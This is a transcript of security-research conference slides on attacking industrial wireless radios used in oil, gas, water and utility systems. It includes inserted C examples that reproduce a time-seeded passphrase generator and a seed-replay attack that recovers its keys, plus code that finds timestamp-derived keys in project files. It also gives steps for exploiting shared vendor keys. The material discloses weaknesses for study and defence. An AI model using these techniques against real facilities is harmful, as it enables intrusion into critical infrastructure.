COMPROMISING INDUSTRIAL FACILITIES FROM 40 MILES AWAY - Lucas Apa, Carlos Mario Penagos (PowerPoint PPT Presentation)


  1. COMPROMISING INDUSTRIAL FACILITIES FROM 40 MILES AWAY - Lucas Apa, Carlos Mario Penagos

  2. About Us  Lucas Apa, Carlos Penagos  Vulnerability Research, Exploitation, Cryptography, Reverse Engineering, ICS/SCADA  Argentina, Colombia

  3. Agenda  Motivation  Industries and Applications  Wireless Standards  Journey of Radio Encryption Keys  Vendor1 Wireless Devices  Vendor2 Wireless Devices  Vendor3 Wireless Devices

  4. Motivation  Critical infrastructures are becoming targets  Insider attacks (lately)  Devices connected to the Internet  0days to reach the PLC, RTU, HMI…  Stealthy and precise attacks  Incident response at hazardous sites

  5. Industrial Wireless Automation  Copper wires are used to monitor and control: corrosion, ductility, thermal conductivity; cost of wires, trenching, mounting and installation  Industrial wireless solutions: eliminate the cost of hardwiring, logistics and installation; heavy machinery involved; remote control and administration (geography); minimize safety risk and dangerous boxes; add durability

  6. Industries and Applications  Oil & Gas: plunger lift/artificial lift optimization, well-head automation, RTU/EFM I/O extensions, cathodic protection monitoring, hydrogen sulfide (H2S) monitoring  Refined Petroleum / Petrochemicals: tank level monitoring, pipeline cathodic protection, rectifier voltage monitoring, gas/liquid flow measurement, pipeline pressure and valve monitoring

  7. Industries and Applications (2)  Energy - Utilities: transformer temperature, natural gas flow, power outage reporting, capacitor bank control, kV/Amp/MW/MVAR readings  Water & Waste Water: remote pumping stations, water treatment plants, water distribution systems, wastewater/sewer collection systems, water irrigation systems/agriculture

  8. Industrial Wireless Challenges  Defeat electromagnetic interference (EMI)  Handle signal attenuation and reflections  Reliability is far more important than speed  Higher transmitter power levels  Site surveys to assess the consistency and reliability of the plant  Mainly 2.4 GHz or 900 MHz (ISM bands)  No "business" protocols

  9. Cryptographic Key Distribution (WSN)  Distribute secrets to a large number of nodes  Base stations with clusters surrounding them  Limitations: deployment in public or hostile locations; post-deployment knowledge; limited bandwidth and transmission power  Methods for crypto key distribution: out-of-band, in-band, factory pre-loaded

  10. IEEE 802.15.4 Standard  Wireless radios (low power/speed)  Setting the encryption algorithm and AES key is an upper-layer responsibility  Each node can have an ACL  PHY/MAC for the upper layers: ZigBee, WirelessHART, ISA SP100, IETF 6LoWPAN (IPv6 over LoWPAN)

  11. ZigBee 2007 (Standard Security Mode)  Suite of high-level communication protocols  Based on IEEE 802.15.4 (low-level layers)  ISM radio bands  Trust Center introduced in 2007  Network Key (AES 128-bit)  Two key distribution mechanisms: 1. Pre-installed (factory installed, via commissioning tool); 2. Individually commissioned over the air, managed by the Trust Center (Diagram: Trust Center with nodes A and B)

  12. ZigBee Pro 2007 (High Security Mode)  Many enhancements  More memory requirements  New keys introduced: ① Master Key: distributed by the Trust Center with an out-of-band technique; secures the other keys (MasterKey_TA, MasterKey_TB, MasterKey_AB) ② Link Key: unicast, unique between two nodes (LinkKey TA, LinkKey TB, LinkKey AB) ③ Network Key: regenerated at intervals; needed to join the NWK (Diagram: Trust Center and nodes A, B, with the Network Key marked as unsecured transport)

  13. The Journey of Radio Encryption Keys (Diagram: the key's path through three parties. Radio Device Vendor: no encryption key, or key in firmware. Device Company: no encryption key, company encryption key, or per-client encryption key. End User: no change, set encryption key, or change encryption key.)

  14. Reusing Radio Keys  End-user node key storage  Shared secret  Same firmware or same radio key  Device Company Key attack: 1. Buy the same device (buy the same key) 2. Remove the radio module 3. Connect to the USB interface 4. Interact: API & AT command mode 5. Send frames using the unknown key  Warning: not possible if a per-client encryption key exists

  15. Exploiting Vendor1 Devices  Company profile (+1990)  Frequency hopping wireless devices  Great for long or short range wireless SCADA applications  Secure proprietary FHSS with 128-bit AES encryption  Hazardous location approvals, perfect for outdoor Ethernet SCADA or indoor PLC messaging  30+ miles point to point with high gain antennas

  16. Vendor1 Key Distribution  "<Vendor1 Tool> is easy to use and intuitive. Default values built into the software work well for initial installation and testing, making it easy for first-time users. <Vendor1 Tool> manages all important settings to ensure that the network performs correctly." (User Guide)  RF Encryption: a 128-bit encryption level key is suggested to the user  Blank: no encrypted packets  5-7 chars: field is translated into a 40-bit encryption level  15-24 chars: field is translated into a 128-bit encryption level

  17. Reversing Passphrase Generation  Compiled C++ binary  srand(time(NULL)): srand seeds the PRNG, time returns the epoch second  Low-entropy seed  Same algorithm on every run  rand(): a bad ANSI C function for generating secrets

  18. Attacking Weak PRNG
    C:\>passgen.exe
    2013-04-04 21:39:08 => 1365136748 => knc6gadr40565d3j8hbrs6o0

  19. The Oldest Passphrase: Help File
    C:\>passgen.exe
    2013-04-04 21:39:08 => 1365136748 => knc6gadr40565d3j8hbrs6o0
    2013-04-04 21:39:07 => 1365136747 => nir3f1a0dm2sdt41q91c06nt
    …
    2008-04-17 15:20:47 => 1208470847 => re84q92vssgd671pd2smj8ig

  20. Commissioning Tool Audit
    Bruteforce Passphrase                                 | Weak PRNG Attack
    25 70 passphrases (mixed lower case alphabet plus     | ~156 million passphrases (every second that
    numbers and common symbols)                           |   passes, one more key)
    Impossible to calculate all passphrases               | Only a few seconds to calculate all passphrases
    Need to derive the AES 128-bit key in real time       | Calculate once and create a database with all
                                                          |   possible AES 128-bit key derivations
     Easily breakable by an outsider  Further research with the devices  Commissioning tools need deep testing
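Added example of the pattern slides 17 to 20 describe, written for this page; it is not the authors' passgen.exe nor the vendor's commissioning tool. It reproduces the srand(time(NULL)) / rand() generator and the replay attack against it. Assumptions not on the slides: each character is drawn from the 36-symbol set [a-z0-9] with rand() % 36 and 24 characters are emitted (the shape of the passphrases shown, not necessarily the real mapping), and rand() is whatever this C library provides, which is all the attacker needs as long as it is the same library the victim tool was built against. With the help-file date 1208470847 as the oldest seed and 1365136748 as "now", the search space is 156,665,902 seeds, the "~156 million" on slide 20.

```c
/* Added example, not the authors' passgen.exe: the same srand(time(NULL)) /
 * rand() pattern slide 17 describes, and the replay attack against it.
 * Assumptions (not on the slides): 24 characters drawn from [a-z0-9] with
 * rand() % 36; rand() is this C library's implementation. */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define PASS_LEN 24
static const char ALPHABET[] = "abcdefghijklmnopqrstuvwxyz0123456789"; /* assumed charset */

/* Vulnerable generator: the whole passphrase is a function of one 32-bit
 * seed, and that seed is a wall-clock second. */
void passgen_from_seed(unsigned int seed, char out[PASS_LEN + 1]) {
    srand(seed);
    for (int i = 0; i < PASS_LEN; i++)
        out[i] = ALPHABET[rand() % (int)(sizeof(ALPHABET) - 1)];
    out[PASS_LEN] = '\0';
}

/* What the commissioning tool effectively runs. */
void passgen_now(char out[PASS_LEN + 1]) {
    passgen_from_seed((unsigned int)time(NULL), out);
}

/* Attacker: replay every seed in [first, last] until one reproduces the
 * target passphrase. Returns the seed, or 0 when none matches. */
unsigned int recover_seed(const char *target, unsigned int first, unsigned int last) {
    char cand[PASS_LEN + 1];
    for (unsigned int s = first; s <= last; s++) {
        passgen_from_seed(s, cand);
        if (strcmp(cand, target) == 0)
            return s;
        if (s == UINT_MAX) break;      /* avoid wrap-around when last == UINT_MAX */
    }
    return 0;
}

/* Candidates the attacker must try: one per second between the oldest
 * possible installation (slide 19 uses the help-file date) and now. */
unsigned long long weak_keyspace(unsigned int oldest, unsigned int newest) {
    return (unsigned long long)(newest - oldest) + 1ULL;
}

/* Candidates a blind brute force faces: 36^24 for the assumed charset. */
double bruteforce_keyspace(void) {
    double n = 1.0;
    for (int i = 0; i < PASS_LEN; i++)
        n *= (double)(sizeof(ALPHABET) - 1);
    return n;
}

/* Round trip: generate at `seed`, then recover it by searching +/- `window` s. */
int seed_recovery_works(unsigned int seed, unsigned int window) {
    char pass[PASS_LEN + 1];
    passgen_from_seed(seed, pass);
    return recover_seed(pass, seed - window, seed + window) == seed;
}

int main(void) {
    const unsigned int oldest = 1208470847u;  /* help-file date, slide 19 */
    const unsigned int newest = 1365136748u;  /* demo timestamp, slide 18 */
    char pass[PASS_LEN + 1];

    passgen_from_seed(newest, pass);
    printf("%u => %s\n", newest, pass);
    printf("weak-PRNG search: %llu seeds; blind brute force: %.3g passphrases\n",
           weak_keyspace(oldest, newest), bruteforce_keyspace());
    printf("seed recovered from its passphrase: %s\n",
           seed_recovery_works(newest, 3600) ? "yes" : "no");
    return 0;
}
```

The passphrase printed will differ from the slide's because the real tool's rand()-to-character mapping is not known; the point is that recover_seed() succeeds against any generator of this shape, and that the database of "all possible keys" slide 20 mentions is just the output of passgen_from_seed() over the weak_keyspace() range.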

  21. Vendor2 Wireless Devices  Market leadership: Oil & Gas  Wireless and wired solutions for digital oil field automation  Trusted by top companies in different industries  Family system (point to multipoint): wireless gateways, wireless transmitters, I/O expansion modules, hardwired sensors

  22. (image-only slide)

  23. An Extended Family of Devices  Applications: Oil & Gas; Refining / Petrochemicals; Water & Waste Water; Utilities; Industrial Process Monitoring  Transmitters: RTD temperature transmitter; analog/discrete transmitter; flow totalizer transmitter; pressure transmitter; hydrostatic level transmitter; many more..

  24. (Diagram: PLC, RF, RTU, Modem, SCADA, DCS, EFM, HMI)

  25. Tool and Project Files  How do the devices access the wireless information?  "Enhanced Site Security Key": "The Enhanced Site Security feature is designed to provide an additional level of protection for RF packets sent and received between <Vendor2> devices and minimizes the possibility of interference from other devices in this area. This feature is not available on some older versions of legacy devices." (vendor documentation)  Security Key == Encryption Key???  Legacy devices without encryption???

  26. Key Generation and Distribution  Create a "Project File" and update all nodes  From the documentation: "If the project file name is changed, a new Site Security Key will be assigned"  Possible scheme: per-site encryption  This key MUST be somewhere in the project file

  27. File Name Change => New Key

  28. Project File Binary Diffing (the four differing bytes read as a little-endian 32-bit Unix timestamp)
    ProjectA: \x17\x58\x4f\x51 => 1364154391 => Sun, 24 Mar 2013 19:46:31 GMT
    ProjectB: \x51\x58\x4f\x51 => 1364154449 => Sun, 24 Mar 2013 19:47:29 GMT
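Added example for slides 26 to 28, written for this page; it is not the vendor's tool and the file layout is not the vendor's. Two constructed "project files" differ in a 4-byte field and in their name; the code diffs them byte by byte, then scans for 4-byte little-endian words that decode to a plausible timestamp, which is how the bytes on slide 28 (\x17\x58\x4f\x51 == 1364154391, Sun, 24 Mar 2013 19:46:31 GMT) give away a time-derived key. The header bytes, the field offset and the project names are made up for the demo; the two key values and their 58-second difference are the ones on the slide.

```c
/* Added example, not the vendor's tool or project-file layout. The
 * PROJECT_A/PROJECT_B blobs are constructed for the demo; only the four
 * key bytes come from slide 28. */
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <time.h>

static const unsigned char PROJECT_A[] = {
    'P','R','J',0x00,  0x02,0x00,0x00,0x00,    /* magic, version (constructed) */
    0x17,0x58,0x4f,0x51,                       /* ProjectA bytes from slide 28 */
    'P','r','o','j','e','c','t','A',0,0,0,0    /* project name, zero padded */
};
static const unsigned char PROJECT_B[] = {
    'P','R','J',0x00,  0x02,0x00,0x00,0x00,
    0x51,0x58,0x4f,0x51,                       /* ProjectB bytes from slide 28 */
    'P','r','o','j','e','c','t','B',0,0,0,0
};

/* Byte-level diff of two equal-sized blobs. Returns the number of differing
 * bytes and, when that is non-zero, the first and last differing offset. */
size_t diff_bytes(const unsigned char *a, const unsigned char *b, size_t n,
                  size_t *first, size_t *last) {
    size_t count = 0;
    for (size_t i = 0; i < n; i++) {
        if (a[i] == b[i]) continue;
        if (count == 0) *first = i;
        *last = i;
        count++;
    }
    return count;
}

uint32_t read_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Offsets of 4-byte-aligned LE words whose value lies in [lo, hi], i.e. that
 * look like epoch timestamps from the chosen period. Returns the count. */
int find_epoch_words(const unsigned char *blob, size_t n, uint32_t lo, uint32_t hi,
                     size_t *offsets, int max) {
    int found = 0;
    for (size_t off = 0; off + 4 <= n && found < max; off += 4) {
        uint32_t v = read_le32(blob + off);
        if (v >= lo && v <= hi) offsets[found++] = off;
    }
    return found;
}

/* The one word in a 2013 project file that decodes to a 2013 timestamp, or 0
 * when there is none or more than one candidate. */
uint32_t project_key(const unsigned char *blob, size_t n) {
    const uint32_t lo = 1356998400u;   /* 2013-01-01 00:00:00 UTC */
    const uint32_t hi = 1388534399u;   /* 2013-12-31 23:59:59 UTC */
    size_t offs[2];
    if (find_epoch_words(blob, n, lo, hi, offs, 2) != 1) return 0;
    return read_le32(blob + offs[0]);
}

/* Number of bytes that differ between the two sample files. */
size_t project_diff_count(void) {
    size_t first, last;
    return diff_bytes(PROJECT_A, PROJECT_B, sizeof PROJECT_A, &first, &last);
}

void epoch_to_utc(uint32_t t, char *buf, size_t len) {
    time_t tt = (time_t)t;
    struct tm *g = gmtime(&tt);
    if (!g || strftime(buf, len, "%a, %d %b %Y %H:%M:%S GMT", g) == 0)
        buf[0] = '\0';
}

int main(void) {
    size_t first = 0, last = 0;
    size_t n = diff_bytes(PROJECT_A, PROJECT_B, sizeof PROJECT_A, &first, &last);
    printf("%zu differing byte(s), offsets %zu..%zu\n", n, first, last);

    const unsigned char *files[2] = { PROJECT_A, PROJECT_B };
    for (int i = 0; i < 2; i++) {
        char when[64];
        uint32_t key = project_key(files[i], sizeof PROJECT_A);
        epoch_to_utc(key, when, sizeof when);
        printf("Project%c key %u => %s\n", 'A' + i, key, when);
    }
    return 0;
}
```

On a real project file the same scan is run against the file's modification time: a word within a few seconds of it is the prime suspect for a key derived from "when the file was created", which is what the two slide timestamps 58 seconds apart suggest.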

  29. Component Identification  Support center  Firmware images & documentation  Radio modules, architectures & processors (RISC)

  30. Understanding Firmware Image (RISC)  Industry-standard text format: "@address" followed by the content bytes  Incomplete image (update only)  Only compiler strings: CrossWorks for MSP430

  31. Component Identification: 430F149
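Added example for slides 30 and 31, written for this page; it is not vendor firmware or a vendor tool. It loads the "@address followed by hex bytes" image layout slide 30 describes into a flat 64 KiB memory map and reports which address ranges the image actually supplies. Assumptions: that layout is TI's TI-TXT text format (the slides do not name it), which terminates with a lone "q"; the sample image is constructed for the demo; the reset vector at 0xFFFE is the standard MSP430 location. An update-only image leaves most of flash unaccounted for, which is what image_covers() reports.

```c
/* Added example, not vendor firmware or a vendor tool: a loader for the
 * "@address + hex bytes" layout of slide 30. Assumed to be TI-TXT. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <stdint.h>

#define MEM_SIZE 0x10000       /* 16-bit MSP430 address space */
#define MAX_SECTIONS 16

typedef struct { uint32_t start, end; } Section;    /* [start, end) */

typedef struct {
    uint8_t mem[MEM_SIZE];
    uint8_t present[MEM_SIZE];   /* 1 where the image supplied a byte */
    Section sec[MAX_SECTIONS];
    int nsec;
} Image;

/* Constructed sample: 12 bytes of code at 0x1100 and a reset vector at
 * 0xFFFE pointing back at 0x1100. */
static const char SAMPLE_TXT[] =
    "@1100\n"
    "31 40 00 0A 3C 40 00 11 B0 12 38 11\n"
    "@FFFE\n"
    "00 11\n"
    "q\n";

/* Parse `txt` into `img`. Returns the section count, or -1 on malformed
 * input (bad address, byte outside the address space, missing 'q'). */
int parse_titxt(const char *txt, Image *img) {
    memset(img, 0, sizeof *img);
    uint32_t addr = 0;
    const char *p = txt;
    while (*p) {
        while (isspace((unsigned char)*p)) p++;
        if (*p == '\0') break;
        if (*p == 'q') return img->nsec;                  /* end-of-image marker */
        char *end;
        if (*p == '@') {                                  /* new section */
            if (img->nsec == MAX_SECTIONS) return -1;
            addr = (uint32_t)strtoul(p + 1, &end, 16);
            if (end == p + 1 || addr >= MEM_SIZE) return -1;
            img->sec[img->nsec].start = addr;
            img->sec[img->nsec].end = addr;
            img->nsec++;
            p = end;
            continue;
        }
        unsigned long v = strtoul(p, &end, 16);           /* one data byte */
        if (img->nsec == 0 || end != p + 2 || v > 0xFF || addr >= MEM_SIZE) return -1;
        img->mem[addr] = (uint8_t)v;
        img->present[addr] = 1;
        img->sec[img->nsec - 1].end = ++addr;
        p = end;
    }
    return -1;                                            /* no 'q' terminator */
}

/* Bytes the image actually supplies. */
size_t bytes_present(const Image *img) {
    size_t n = 0;
    for (size_t a = 0; a < MEM_SIZE; a++) n += img->present[a];
    return n;
}

/* 1 if every byte of [lo, hi) is present, 0 if the image leaves a gap. */
int image_covers(const Image *img, uint32_t lo, uint32_t hi) {
    for (uint32_t a = lo; a < hi; a++)
        if (!img->present[a]) return 0;
    return 1;
}

/* MSP430 reset vector: little-endian word at 0xFFFE. Returns 0 if absent. */
uint16_t reset_vector(const Image *img) {
    if (!img->present[0xFFFE] || !img->present[0xFFFF]) return 0;
    return (uint16_t)(img->mem[0xFFFE] | (img->mem[0xFFFF] << 8));
}

/* Parse the sample once and hand out the result (NULL on parse failure). */
const Image *sample_image(void) {
    static Image img;
    static int rc = -2;
    if (rc == -2) rc = parse_titxt(SAMPLE_TXT, &img);
    return rc < 0 ? NULL : &img;
}

int main(void) {
    const Image *img = sample_image();
    if (!img) { fprintf(stderr, "parse error\n"); return 1; }
    for (int i = 0; i < img->nsec; i++)
        printf("section %d: 0x%04X-0x%04X (%u bytes)\n", i,
               (unsigned)img->sec[i].start, (unsigned)(img->sec[i].end - 1),
               (unsigned)(img->sec[i].end - img->sec[i].start));
    printf("%zu bytes present, reset vector -> 0x%04X, flash 0x1100-0xFFFF covered: %s\n",
           bytes_present(img), (unsigned)reset_vector(img),
           image_covers(img, 0x1100, MEM_SIZE) ? "yes" : "no");
    return 0;
}
```

The section list is the first thing to check before disassembly: a reset vector that points into a range the image does not contain means the update carries only part of the code, and the missing part (bootloader, radio driver) has to come from the device itself.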

  32. YouTube (XT09 and 802.15.4)

  33. No Per-Client Key
    Dear <<Reseller Sales Eng>>,
    We are going to borrow a used "Analog Transmitter" from one of our partners. We are going to test it for a few weeks and let you know if we decide to buy a new one. Are there any specific concerns we might take into account when deploying this device to connect it with our <Device>? Or just upgrade all project configuration files?
    Thanks.

    Lucas,
    You just need to upgrade the configuration files.
    Thank you
